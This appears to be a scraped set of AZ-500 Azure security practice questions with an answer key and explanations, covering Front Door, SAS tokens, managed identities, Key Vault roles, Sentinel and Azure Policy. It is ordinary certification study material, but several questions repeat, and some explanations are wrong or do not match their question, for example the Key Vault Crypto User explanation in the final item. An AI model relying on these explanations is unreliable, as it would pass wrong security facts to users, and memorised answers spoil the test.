                            You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do?

                            • Configure Traffic Manager.
                            • Configure Azure Application Gateway.
                            • Configure Azure Front Door and switch access to the app via an internal load balancer.
                            • Configure Azure Firewall.
                            See response

                            Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not to perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge. Azure Application Gateway: While Azure Application Gateway is a Layer 7 load balancer that can provide SSL termination and load balancing for web applications, it is not positioned at the network edge like Azure Front Door. Application Gateway is typically used for routing traffic within a virtual network to backend services. It can offload SSL traffic, but it's more for managing traffic within the Azure infrastructure, and it does not provide the same level of global load balancing and edge routing capabilities as Azure Front Door.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-17","title":"Question 17","text":"

                            You have an Azure subscription that contains a virtual network named VNet1. You plan to deploy an Azure App Service web app named Web1. You need to be able to deploy Web1 to the subnet of VNet1. The solution must minimize costs. Which pricing plan should you use for Web1?

                            • Basic
                            • Shared
                            • Isolated
                            • Premium
                            See response

                            Only the Isolated pricing plan (tier) can be deployed to a virtual network subnet. With other pricing plans, inbound traffic is always routed to the public IP address of the web app, while web app outbound traffic can reach the endpoints on a virtual network.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-18","title":"Question 18","text":"

                            You have a data connector for Microsoft Sentinel. You need to configure the connector to collect logs from Conditional Access in Azure AD. Which log should you connect to Microsoft Sentinel?

                            • Sign-in logs
                            • Audit logs
                            • Activity logs
                            • Provisioning logs
                            See response

                            Sign-in logs include information about sign-ins and how resources are used by your users. Audit logs include information about changes applied to your tenant, such as user and group management or updates applied to your tenant\u2019s resources. Activity logs include subscription-level events, not tenant-level activity. Provisioning logs include activities performed by the provisioning service, such as the creation of a group in ServiceNow or a user imported from Workday.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-19","title":"Question 19","text":"

                            You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution. Select all answers that apply.

                            • SAS account SAS
                            • service SAS
                            • Storage Blob Data Reader role
                            • user delegation
                            See response

                            user delegation and Storage Blob Data Reader role.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-20","title":"Question 20","text":"

                            You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

                            • az sql mi ad-admin create
                            • az sql mi ad-only-auth enable
                            • az sql server ad-admin create
                            • az sql server ad-only-auth enable
                            See response

                            az sql server ad-only-auth enable\u00a0enables authentication only through Azure AD.\u00a0az sql server ad-admin create\u00a0and\u00a0az sql mi ad-admin create\u00a0do not stop other authentication methods.\u00a0az sql mi ad-only-auth enable\u00a0enables Azure AD-only authentication for Azure SQL Managed Instance, not Microsoft SQL Server.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-21","title":"Question 21","text":"

                            You have an application that securely shares files hosted in Azure Blob storage to external users by using an account SAS. One of the SAS tokens is compromised. How should you stop the compromised SAS token from being used? Select only one answer.

                            • Regenerate the storage account access keys.
                            • Set the Allow public anonymous access to setting for the storage account.
                            • Set the Secure transfer required property for the storage account.
                            • Switch to managed identities.
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-22","title":"Question 22","text":"

                            You have an Azure AD tenant. Users have both Windows and non-Windows devices. All users have smart phones. You plan to implement Azure AD Multi-Factor Authentication (MFA). You need to ensure that Azure MFA is used to authenticate users to Azure resources. The solution must be implemented without any additional cost. Which three Azure MFA method should you implement? Each correct answer presents a complete solution. Select all answers that apply.

                            • FIDO2 security keys
                            • OATH software tokens
                            • SMS verification
                            • the Microsoft Authenticator app
                            • voice call verification
                            • Windows Hello for Business
                            See response

                            SMS verification, The Microsoft Authenticator app, and voice call verification.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-23","title":"Question 23","text":"

                            You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution. Select all answers that apply.

                            • address
                            • email
                            • offline_access
                            • openID
                            • phone
                            See response

                            email, openID, offline_access.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-24","title":"Question 24","text":"

                            You have an Azure subscription that contains a user named Admin1. You need to ensure that Admin1 can access the Regulatory compliance dashboard in Microsoft Defender for Cloud. The solution must follow the principle of least privilege. Which two roles should you assign to Admin1? Each correct answer presents part of the solution. Select all answers that apply.

                            • Global Reader
                            • Resource Policy Contributor
                            • Security Admin
                            • Security Reader
                            See response

                            To use the Regulatory compliance dashboard in Defender for Cloud, you must have sufficient permissions. At a minimum, you must be assigned the Resource Policy Contributor and Security Admin roles.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-25","title":"Question 25","text":"

                            Your company has a multi-cloud online environment. You plan to use Microsoft Defender for Cloud to protect all supported online environments. Which three environments support Defender for Cloud? Each correct answer presents a complete solution. Select all answers that apply.

                            • Alibaba Cloud
                            • Amazon Web Services (AWS)
                            • Azure DevOps
                            • GitHub
                            • Oracle Cloud
                            See response

                            Defender for Cloud protects workloads in Azure, AWS, GitHub, and Azure DevOps. Oracle Cloud and Alibaba Cloud are unsupported by Defender for Cloud.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-26","title":"Question 26","text":"

                            You have Azure SQL databases that contain credit card information. You need to identify and label columns that contain credit card numbers. Which Microsoft Defender for Cloud feature should you use? Select only one answer.

                            • hash reputation analysis
                            • inventory filters
                            • SQL information protection
                            • SQL Servers on machines
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-27","title":"Question 27","text":"

                            You configure Microsoft Sentinel to connect to different data sources. You are unable to configure a connector that uses an Azure Functions API connection. Which permissions should you change? Select only one answer.

                            • read and write permissions for Azure Functions
                            • read and write permissions for the workspaces used by Microsoft Sentinel
                            • read permissions for Azure Functions
                            • read permissions for the workspaces used by Microsoft Sentinel
                            See response

                            You need to have read and write permissions to Azure Functions to configure a connector that uses an Azure Functions API connection. You were able to add other connectors, which proves that you have access to the workspace. Read permissions for the workspaces used by Microsoft Sentinel allow you to read data in Microsoft Sentinel. Read permissions to Azure Functions allows you to run functions, not create them.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-28","title":"Question 28","text":"

                            You are configuring retention for Azure activity logs in Azure Monitor logs. The retention period for the Azure Monitor logs is set to 30 days. You need to meet the following compliance requirements:

                            • Store the Azure activity logs for 90 days.
                            • Encrypt the logs by using your own encryption keys.
                            • Use the most cost-efficient storage solution for the logs.

                            What should you do? Select only one answer.

                            • Configure a workspace retention policy.
                            • Configure diagnostic settings and send the logs to Azure Event Hubs Standard.
                            • Configure diagnostic settings and send the logs to Azure Storage.
                            • Leave the default settings as they are.
                            See response

                            Configuring diagnostic settings and sending the logs to Azure Storage meets both the retention time and encryption requirements. Activity log data type is kept for 90 days by default, but the logs are stored by using Microsoft-managed keys. Configuring a workspace retention policy is not the most cost-efficient solution for this. Event Hubs is a real-time event stream engine and is not designed to be used instead of a database or as a permanent store for indefinitely held event streams.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-29","title":"Question 29","text":"

                            You need to implement a key management solution that supports importing keys generated in an on-premises environment. The solution must ensure that the keys stay within a single Azure region. What should you do? Select only one answer.

                            • Apply the Keys should be the specified cryptographic type RSA or EC Azure policy.
                            • Disable the Allow trusted services option.
                            • Implement Azure Key Vault Firewall.
                            • Implement Azure Key Vault Managed HSM.
                            See response

                            Key Vault Managed HSM supports importing keys generated in an on-premise HSM. Also, managed HSM does not store or process customer data outside the Azure region in which the customer deploys the HSM instance. On-premises-generated keys are still managed, after implementing Key Vault Firewall. Enforcing HSM-backed keys does not enforce them to be imported. Disabling the Allow trusted services option does not have a direct impact on key importing.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-30","title":"Question 30","text":"

                            You have an Azure subscription that contains the following resources:

                            • A virtual machine named VM1 that has a network interface named NIC1
                            • A virtual network named VNet1 that has a subnet named Subnet1
                            • A public IP address named PubIP1
                            • A load balancer named LB1

                            You create a network security group (NSG) named NSG1. To which two resources can you associate NSG1? Each correct answer presents a complete solution. Select all answers that apply.

                            • LB1
                            • NIC1
                            • PubIP1
                            • Subnet1
                            • VM1
                            • VNet1
                            See response

                            You can associate an NSG to a virtual network subnet and network interface only. You can associate zero or one NSGs to each virtual network subnet and network interface on a virtual machine. The same NSG can be associated to as many subnets and network interfaces as you choose.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-31","title":"Question 31","text":"

                            You have an Azure subscription that contains the following resources:

                            • An web app named WebApp1 in the West US Azure region
                            • A virtual network named VNet1 in the West US 3 Azure region

                            You need to integrate WebApp1 with VNet1. What should you implement first? Select only one answer.

                            • a service endpoint
                            • a VPN gateway
                            • Azure Front door
                            • peering
                            See response

                            WebApp1 and VNet1 are in different regions and cannot use regional integration; you can use only gateway-required virtual network integration. To be able to implement this type of integration, you must first deploy a virtual network gateway in VNet1.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-32","title":"Question 32","text":"

                            You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do? Select only one answer.

                            • Configure an Azure firewall and switch access to the app via an internal load balancer.
                            • Configure Azure Application Gateway.
                            • Configure Azure Front Door and switch access to the app via an internal load balancer.
                            • Configure Azure Traffic Manager with performance traffic routing.
                            See response

                            Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not to perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-33","title":"Question 33","text":"

                            You have an Azure App Service web app named App1. You need to configure network controls for App1. App1 must only allow user access through Azure Front Door. Which two components should you implement? Each correct answer presents part of the solution. Select all answers that apply.

                            • access restrictions based on service tag
                            • access restrictions based on the IP address of Azure Front Door
                            • application security groups
                            • header filters
                            See response

                            Traffic from Front Door to the app originates from a well-known set of IP ranges defined in the\u00a0AzureFrontDoor.Backend\u00a0service tag. This includes every Front Door. To ensure traffic only originates from your specific instance, you will need to further filter the incoming requests based on the unique HTTP header that Front Door sends.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-34","title":"Question 34","text":"

                            You have an Azure SQL database, an Azure key vault, and an Azure App Service web app. You plan to encrypt SQL data at rest by using Bring Your Own Key (BYOK). You need to create a managed identity to authenticate without storing any credentials in the code. The managed identity must share the lifecycle with the Azure resource it is used for. What should you implement?

                            • a system-assigned managed identity for an Azure SQL logical server
                            • a system-assigned managed identity for an Azure web app
                            • a system-assigned managed identity for Azure Key Vault
                            • a user-assigned managed identity
                            See response

                            So, to clarify, it's not about setting the managed identity at the Azure SQL logical server level. The managed identity is associated with the Azure web app, and it is used to access the encryption keys in the Azure Key Vault, enabling the SQL data at rest encryption without storing credentials in your code. The correct answer aligns with this approach.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-35","title":"Question 35","text":"

                            You need to provide an administrator with the ability to manage custom RBAC roles. The solution must follow the principle of least privilege. Which role should you assign to the administrator?

                            • Owner
                            • Contributor
                            • User Access Administrator
                            • Privileged Role Administrator
                            See response

                            User Access Administrator is the least privileged role that grants access to\u00a0Microsoft.Authorization/roleDefinition/write. Assigning the Owner role does not follow the principle of least privilege. Contributor does not have access to\u00a0Microsoft.Authorization/roleDefinition/write. Privileged Role Administrator grants access to manage role assignments in Azure AD, and all aspects of Azure AD Privileged Identity Management (PIM). This is not an RBAC role.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-36","title":"Question 36","text":"

                            You have a storage account that contains multiple containers, blobs, queues, and tables. You need to create a key to allow an application to access only data from a given table in the storage account. Which authentication method should you use for the application?

                            • SAS
                            • service SAS
                            • User delegation
                            • Shared Allow access
                            See response

                            A SAS service is the only type of authentication that provides control at the table level. User delegation SAS is only available for Blob storage. SAS and shared allow access to the entire storage account.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-37","title":"Question 37","text":"

                            You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution.

                            • Storage Blob Data Reader role
                            • service SAS
                            • user delegation
                            • account SAS
                            See response

                            The Storage Blob Data Reader role uses Azure AD to authenticate. User delegation SAS is a method that uses Azure AD to generate a SAS. Both methods work whether the shared keys are allowed or prevented. Service SAS and account SAS use shared keys to generate.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-38","title":"Question 38","text":"

                            You enable Always Encrypted for an Azure SQL database. Which scenario is supported?

                            • encrypting existing data
                            See response

                            Encrypting existing data is supported. Always Encrypted uses the client driver to encrypt and decrypt data. This means that some actions that only occur on the server side will not work.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-39","title":"Question 39","text":"

                            You are evaluating the Azure Policy configurations to identify any required custom initiatives and policies. You need to run workloads in Azure that are compliant with the following regulations:

                            • FedRAMP High
                            • PCI DSS 3.2.1
                            • GDPR
                            • ISO 27001:2013

                            For which regulation should you create custom initiatives?

                            • FedRAMP High
                            • PCI DSS 3.2.1
                            • GDPR
                            • ISO 27001:2013
                            See response

                            To run workloads that are compliant with GDPR, custom initiatives should be to be created. GDPR compliance initiatives are not yet available in Azure. Azure has existing initiatives for ISO, PCI DSS 3.2.1, and FedRAMP High.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-40","title":"Question 40","text":"

                            You have a workload in Azure that uses multiple virtual machines and Azure functions to access data in a storage account. You need to ensure that all access to the storage account is done by using a single identity. The solution must reduce the overhead of managing the identity. Which type of identity should you use? Select only one answer.

                            • group
                            • system-assigned managed identity
                            • user
                            • user-assigned managed identity
                            See response

                            A user assigned managed identity can be shared across Azure resources, and its password changes are handled by Azure. An user needs to manually handle password changes. You cannot use a group as a service principle. Multiple Azure resources cannot share system-assigned managed identities.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-41","title":"Question 41","text":"

                            You have a workload in Azure that uses a virtual machine named VM1. VM1 is in a resource group named RG1. You need to create and assign an identity to VM1 that will be used to access Azure resources. Other virtual machines must be able to use the same identity. Which PowerShell script should you run? Select only one answer.

                            • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VM1\"
                            • New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"
                            • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssigned
                            • $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType SystemAssignedUserAssigned
                            See response

                            New-AzUserAssignedIdentity -ResourceGroupName RG1 -Name VMID $vm = Get-AzVM -ResourceGroupName RG1 -Name VM1 Update-AzVM -ResourceGroupName RG1 -VM $vm -IdentityType UserAssigned -IdentityID \"/subscriptions/<SUBSCRIPTION ID>/resourcegroups/RG1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/VMID\"

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-42","title":"Question 42","text":"

                            You have an Azure subscription that contains an Azure Kubernetes Service (AKS) cluster named AKS1 and a user named User1. You need to ensure that User1 has access to AKS1 secrets. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

                            • Azure Kubernetes Service RBAC Admin
                            • Azure Kubernetes Service RBAC Cluster Admin
                            • Azure Kubernetes Service RBAC Reader
                            • Azure Kubernetes Service RBAC Writer
                            See response

                            Azure Kubernetes Service RBAC Writer has access to secrets. Azure Kubernetes Service RBAC Reader does not have access to secrets. Azure Kubernetes Service RBAC Cluster Admin and Azure Kubernetes Service RBAC Admin do not follow the principle of least privilege.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-43","title":"Question 43","text":"

                            You have an Azure subscription that contains an Azure container registry named CR1. You use Azure CLI to authenticate to the subscription. You need to authenticate to CR1 by using Azure CLI. Which command should you run? Select only one answer.

                            • az acr config
                            • az acr credential
                            • az acr login
                            • docker login
                            See response

                            The\u00a0az acr login\u00a0command is needed to authenticate to an Azure container registry from the Azure CLI. Docker login is used to sign in to a Docker repository.\u00a0az acr config\u00a0is used for configuring Azure Container Registry.\u00a0az acr credential\u00a0is used for managing login credentials for Azure Container Registry.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-44","title":"Question 44","text":"

                            You have an Azure AD tenant that syncs with the on-premises Active Directory Domain Service (AD DS) domain and uses Azure Active Directory Domain Services (Azure AD DS). You have an application that runs on user devices by using the credentials of the signed-in user The application accesses data in Azure Files by using REST calls. You need to configure authentication for the application in Azure Files by using the most secure authentication method. Which authentication method should you use? Select only one answer.

                            • Azure AD
                            • SAS
                            • shared key
                            • on-premises Active Directory Domain Service (AD DS)
                            See response

                            A SAS is the most secure way to access Azure Files by using REST calls. A shared key allows any user with the key to access data. Azure AD and Active Directory Domain Service (AD DS) are unsupported for REST calls.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-45","title":"Question 45","text":"

                            You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

                            • az sql mi ad-admin create
                            • az sql mi ad-only-auth enable
                            • az sql server ad-admin create
                            • az sql server ad-only-auth enable
                            See response

                            az sql server ad-only-auth enable

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-46","title":"Question 46","text":"

                            **You are configuring an Azure Policy in your environment. You need to ensure that any resources that are missing a tag named CostCenter inherit a value from a resource group. You create a custom policy that uses the following snippet. **

                            \"policyRule\": {\n    \"if\": {\n        \"field\": \"tags['CostCenter']\",\n        \"exists\": \"false\"\n    },\n    \"then\": {\n        \"effect\": \"modify\",\n        \"details\": {\n            \"roleDefinitionIds\": [\n                \"/providers/microsoft.authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c\"\n            ],\n            \"operations\": [{\n                \"operation\": \"addOrReplace \",\n                \"field\": \"tags['CostCenter']\",\n                \"value\": \"[resourcegroup().tags['CostCenter']]\"\n            }]\n        }\n    }\n}\n

                            Which policy mode should you use? Select only one answer.

                            • all
                            • Append
                            • DeployIfNotExists
                            • indexed
                            See response

                            Indexed.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-47","title":"Question 47","text":"

                            You set Periodic recurring scans to\u00a0ON\u00a0while implementing a Microsoft Defender for SQL vulnerability assessment. How often will the scan be triggered? Select only one answer.

                            • at a recurrence that you configure
                            • once a day
                            • once a month
                            • once a week
                            See response

                            Once a week.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-48","title":"Question 48","text":"

                            You are implementing Microsoft Defender for SQL vulnerability assessments. In which two locations can users view the results? Each correct answer presents a complete solution. Select all answers that apply.

                            • an Azure Blob storage account
                            • an Azure Event Grid instance
                            • Microsoft Defender for Cloud
                            • Microsoft Teams
                            See response

                            Defender for Cloud is the default and mandatory location to view the results, while a Blob storage account is a mandatory destination and a prerequisite for enabling the scan. The Teams option is unavailable out of the box. A scan completion event is not sent to Event Grid.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-49","title":"Question 49","text":"

                            You are collecting Azure activity logs to Azure Monitor. The retention period for Azure Monitor logs is set to 30 days. To meet compliance requirements, you need to send a copy of the Azure activity logs to your SOC partner. What should you do? Select only one answer.

                            • Configure a workspace retention policy.
                            • Configure diagnostic settings and send the logs to Azure Event Hubs.
                            • Configure diagnostic settings and send the logs to Azure Storage.
                            • Install the Microsoft Sentinel security information and event management (SIEM) connector.
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-50","title":"Question 50","text":"

                            You are designing an Azure solution that stores encrypted data in Azure Storage. You need to ensure that the keys used to encrypt the data cannot be permanently deleted until 60 days after they are deleted. The solution must minimize costs. What should you do? Select only one answer.

                            • Store keys in an HSM-protected key vault that has soft delete and purge protection enabled.
                            • Store keys in an HSM-protected key vault that has soft delete enabled.
                            • Store keys in a software-protected key vault that has soft delete and purge protection enabled.
                            • Store keys in a software-protected key vault that has soft delete enabled and purge protection disabled.
                            See response

                            Store keys in a software-protected key vault that has soft delete and purge protection enabled.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-51","title":"Question 51","text":"

                            You plan to provide connectivity between Azure and your company\u2019s datacenter. You need to define how to establish the connection. The solution must meet the following requirements:

                            • All traffic between the datacenter and Azure must be encrypted.
                            • Bandwidth must be between 10 and 100 Gbps.

                            What should you use for the connection? Select only one answer.

                            • Azure VPN Gateway
                            • ExpressRoute Direct
                            • ExpressRoute with a provider
                            • VPN Gateway with Azure Virtual WAN
                            See response

                            ExpressRoute Direct

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-52","title":"Question 52","text":"

                            You are operating in a cloud-only environment. Users have computers that run either Windows 10 or 11. The users are located across the globe. You need to secure access to a point-to-site (P2S) VPN by using multi-factor authentication (MFA). Which authentication method should you implement? Select only one answer.

                            • Authenticate by using Active Directory Domain Services (AD DS).
                            • Authenticate by using native Azure AD authentication.
                            • Authenticate by using native Azure certificate-based authentication.
                            • Authenticate by using RADIUS.
                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-53","title":"Question 53","text":"

                            You have an Azure subscription that contains the following resources:

                            • Two virtual networks
                              • VNet1: Contains two subnets
                              • VNet2: Contains three subnets
                            • Virtual machines: Connected to all the subnets on VNet1 and VNet2
                            • A storage account named storage1

                            You need to identify the minimal number of service endpoints that are required to meet the following requirements:

                            • Virtual machines that are connected to the subnets of VNet1 must be able to access storage1 over the Azure backbone.
                            • Virtual machines that are connected to the subnets of VNet2 must be able to access Azure AD over the Azure backbone.

                            **How many service endpoints should you recommend? Select only one answer. **

                            • 2
                            • 3
                            • 4
                            • 5
                            See response

                            A service endpoint is configured for a specific server at the subnet level. Based on the requirements, you need to configure two service endpoints for\u00a0Microsoft.Storage\u00a0on VNet1 because VNet1 has two subnets and three service endpoints for\u00a0Microsoft.AzureActiveDirectory\u00a0on VNet2 because VNet2 has three subnets. The minimum number of service endpoints that you must configure is five.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-54","title":"Question 54","text":"

                            You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

                            • Subnet1: Has a connected virtual machine
                            • Subnet2: Has a\u00a0Microsoft.Storage\u00a0service endpoint
                            • Subnet3: Has subnet delegation to the\u00a0Microsoft.Web/serverFarms\u00a0service
                            • Subnet: Has no additional configurations

                            You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1? Select only one answer.

                            • Subnet4 only
                            • Subnet3 and Subnet4 only
                            • Subnet2 and Subnet4 only
                            • Subnet2, Subnet3, and Subnet4 only
                            • Subnet1, Subnet2, Subnet3, and Subnet4
                            See response

                            You can deploy an SQL managed instance to a dedicated virtual network subnet that does not have any resource connected. The subnet can have a service endpoint or can be delegated for a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-55","title":"Question 55","text":"

                            You use Azure Blueprints to deploy resources to a resource group named RG1. After the deployment, you try to add a disk to a virtual machine created by using Blueprints, but you get an access denied error. You open\u00a0RG1\u00a0and check your access. You notice that you are listed as part of the Virtual Machine Contributor role for RG1, and there are no deny assignments or classic administrators in the resource group scope. Why are you unable to manage the virtual machine? Select only one answer.

                            • Blueprints created a deny assignment for the virtual machine resource.
                            • Blueprints removed the user from the Classic Administrator role.
                            • You must be part of the Disk Pool Operator role.
                            • You must be part of the Virtual Machine Administrator Login role.
                            See response

                            Blueprints must have created a deny assignment at the resource level. The Disk Pool Operator role allows users to provide permissions to the StoragePool resource provider, and the Virtual Machine Administrator Login role allows users to view the virtual machine in the portal and sign in as an administrator. You still have the Contributor role and should be able to manage a virtual machine unless a deny assignment is in place.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-56","title":"Question 56","text":"

                            You create an Azure policy by using the following snippet.

                            \"then\": {\n    \"effect\": \"\",\n    \"details\": [{\n        \"field\": \"Microsoft.Storage/storageAccounts/networkAcls.ipRules\",\n        \"value\": [{\n            \"action\": \"Allow\",\n            \"value\": \"134.5.0.0/21\"\n        }]\n    }]\n}\n

                            You need to ensure that the policy is applied whenever a new storage account is created or updated. There is no managed identity assigned to the policy initiative. Which effect should you use? Select only one answer.

                            • Append
                            • Audit
                            • DeployIfNotExists
                            • Modify
                            See response

                            Append\u00a0is used to add fields to existing properties.\u00a0Modify\u00a0is used to add, update, or remove properties, it does not ensure that a field has value.\u00a0DeployIfNotExists\u00a0is used to deploy resources.\u00a0Audit\u00a0is used to check for compliance.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-57","title":"Question 57","text":"

                            You have an Azure subscription. You need to recommend a solution that uses crawling technology of Microsoft to discover and actively scan assets within an online infrastructure. The solution must also discover new connections over time. What should you include in the recommendation? Select only one answer.

                            • a Microsoft Defender for Cloud custom initiative
                            • Microsoft Defender External Attack Surface Management (EASM)
                            • Microsoft Defender for Servers
                            • the Microsoft cloud security benchmark (MCSB)
                            See response

                            Defender EASM applies the crawling technology of Microsoft to discover assets that are related to your known online infrastructure and actively scans these assets to discover new connections over time. Attack Surface Insights are generated by applying vulnerability and infrastructure data to showcase the key areas of concern for your organization.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-58","title":"Question 58","text":"

                            You have an Azure subscription and the following SQL deployments:

                            • An Azure SQL database named DB1
                            • An Azure SQL Server named sqlserver1
                            • An instance of SQL Server on Azure Virtual Machines named VM1 that has Microsoft SQL Server 2022 installed
                            • An on-premises server named Server1 that has SQL Server 2019 installed

                            Which deployments can be protected by using Microsoft Defender for Cloud? Select only one answer.

                            • DB1 and sqlserver1 only
                            • DB1, sqlserver1, and VM1 only
                            • DB1, sqlserver1, VM1, and Server1
                            • sqlserver1 only
                            • sqlserver1 and VM1 only
                            See response

                            Defender for Cloud includes Microsoft Defender for SQL. Defender for SQL can protect Azure SQL Database, Azure SQL Server, SQL Server on Azure Virtual Machines, and SQL servers installed on on-premises servers.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-59","title":"Question 59","text":"

                            You are designing a solution that must meet FIPS 140-2 Level 3 compliance in Azure. Where should the solution maintain encryption keys? Select only one answer.

                            • a managed HSM
                            • a software-protected Azure key vault
                            • an Azure SQL Manage Instance database
                            • an HSM-protected Azure key vault
                            See response

                            A managed HSM is level 3-compliant. An HSM-protected key vault is level 2-compliant. A software-protected key vault is level 1-complaint. SQL is not FIPS 104-2 level 3 compliant.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-60","title":"Question 60","text":"

                            You have an Azure tenant that contains a user named User1 and an Azure key vault named Vault1. Vault1 is configured to use Azure role-based access control (RBAC). You need to ensure that User1 can perform actions on keys in Vault1 but cannot manage permissions. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

                            • Key Vault Crypto Officer
                            • Key Vault Crypto User
                            • Key Vault Reader
                            • Key Vault Secrets Officer
                            • Key Vault Secrets User
                            See response

                            Correct: Key Vault Crypto Officer \u2013\u2013 This role meets the requirements. Incorrect: Key Vault Secrets Officer \u2013\u2013 This role is for secrets, not keys. Incorrect: Key Vault Reader \u2013\u2013 This role is only for read access, not performing actions. Incorrect: Key Vault Crypto User \u2013\u2013 This role can manage permissions. Incorrect: Key Vault Secrets User \u2013\u2013 This role is for secrets, not keys.

